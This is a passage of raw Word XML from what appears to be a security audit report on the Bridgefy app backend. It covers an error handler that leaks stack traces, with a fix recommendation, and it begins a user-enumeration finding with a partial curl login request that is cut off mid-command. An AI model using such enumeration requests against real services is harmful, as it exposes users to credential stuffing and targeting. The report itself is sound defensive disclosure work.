        <w:t>error: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>err.message,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1511" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>details: this._hideDetails ? undefined : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>errDetails,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1313" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="1313" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>status = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>err.code;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1115" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="64"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>File:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="38"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>bridgefy-app-backend/src/api/modules/middlewares/common.mid.error.ts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Code:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="1115" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>} </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>else if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(err instanceof CommonError) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="1313" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>const errDetails = `</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>${err.code} </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>${err.name}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>${err.stack}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>`;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="1313" w:right="2862" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-19"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(this._hideErrorDetails)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-19"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>this._log.error(errDetails); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(err.parent) global.logger.error(err.parent);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="1313" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>response = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="1511" w:right="5637" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>response:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-25"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>err.response, message: err.message,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="1511" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>details: this._hideErrorDetails ? </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>errDetails,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="1313" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1313" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>status = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>err.code;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="1115" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="113"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="368"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It is recommended to save detailed error messages on the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>server-side</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>only</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>provide</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>a correlation ID on the client-side. This allows developers to retain debugging</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>capabilities by looking up the correlation ID on the server, without leaking any sensitive information to API clients. For additional mitigation guidance, please see the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>OWASP Error Handling Cheat Sheet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>98</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>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76"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487613440">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>273654</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="74" name="Graphic 74"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="74" name="Graphic 74"/>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21.547583pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15703040;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape59" coordorigin="1440,431" coordsize="2880,0" path="m1440,431l4320,431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z w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>98</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId161">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://cheatsheetseries.owasp.org/cheatsheets/Error_Handling_Cheat_Sheet.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="182"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250030" w:id="25"/>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>BFY-01-009</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>WP2/3:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>User</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Enumeration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>via</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Responses</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="37751C"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Low</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="56"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="370"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It was found that a number of Firebase REST API endpoints reveal the existence of registered Bridgefy users to unauthenticated attackers via server responses. While this issue is not a serious security vulnerability on its own, it has privacy implications and could be abused as a preliminary step</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>prior</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>targeting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Bridgefy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>users.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Some</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>examples of this could be </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Credential Stuffing attacks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>99</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>, password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>bruteforce</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>social</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>engineering. This issue can be confirmed with the following commands:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="582" w:lineRule="exact" w:before="32"/>
        <w:ind w:right="4802"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Issue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Enumeration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>via</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Login </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="178" w:lineRule="exact" w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl -i -s -k -X </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'POST' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>-H </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'Content-Type: application/json'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'{"email":"</w:t>
      </w:r>
      <w:hyperlink r:id="rId162">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Consolas"/>
            <w:b/>
            <w:color w:val="DE4F00"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="18"/>
            <w:highlight w:val="yellow"/>
          </w:rPr>
          <w:t>oscar+b0@7asecurity.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
